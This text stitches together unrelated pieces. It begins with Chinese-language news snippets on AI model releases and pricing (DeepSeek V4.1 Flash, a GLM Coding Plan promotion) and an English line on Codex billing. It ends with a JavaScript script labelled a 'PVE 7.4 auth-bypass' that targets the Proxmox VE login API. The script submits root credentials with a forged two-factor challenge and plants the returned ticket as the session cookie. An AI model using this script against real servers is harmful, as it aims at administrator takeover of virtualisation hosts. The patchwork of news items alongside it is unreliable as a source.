DeepSeek 开始内测 V4.1 Flash 中间版本。官方微信群通知称,新模型换了新的模型架构,原生支持多模态,能力更强、速度更快、成本更低。当前计费与 V4 Flash 相同,单账号最多 20 并发。
用户已经可以直接调用。base_url 不用改,只需把原来的模型 ID 换成 deepseek-v4.1-flash-expires-on-0910。
动察 Beating 频道 · 动察 Beating 交流群
GPT-6 Astra usage in Codex does not incur additional long-context multipliers above 272K input tokens. Codex does not charge for cache writes.
9 月 3 日至 9 月 20 日,GLM Coding Plan 推出夜间畅蹬活动,每晚 23 点至次日 9 点, 调用套餐中的 GLM-5.3-Flash,在 ZCode 中免费使用,在其他套餐支持的 Agent 中使用额度翻倍, 进入指定时间段自动生效,覆盖所有付费套餐用户。
// PVE 7.4 auth-bypass @NebuSec 2026
// First, make sure to try logging in as root with this exact password: root@pam
(async () => {
const form = new URLSearchParams({
username: "root@pam",
password: "root@pam",
"tfa-challenge": "NEBUSEC-CHALLENGE",
});
const loginResponse = await fetch("/api2/json/access/ticket", {
method: "POST",
credentials: "omit",
headers: { "Content-Type": "application/x-www-form-urlencoded;charset=UTF-8" },
body: form,
});
const loginBody = await loginResponse.json();
document.cookie = `PVEAuthCookie=${loginBody?.data?.ticket}; Path=/; Secure; SameSite=Strict`;
location.reload()
})();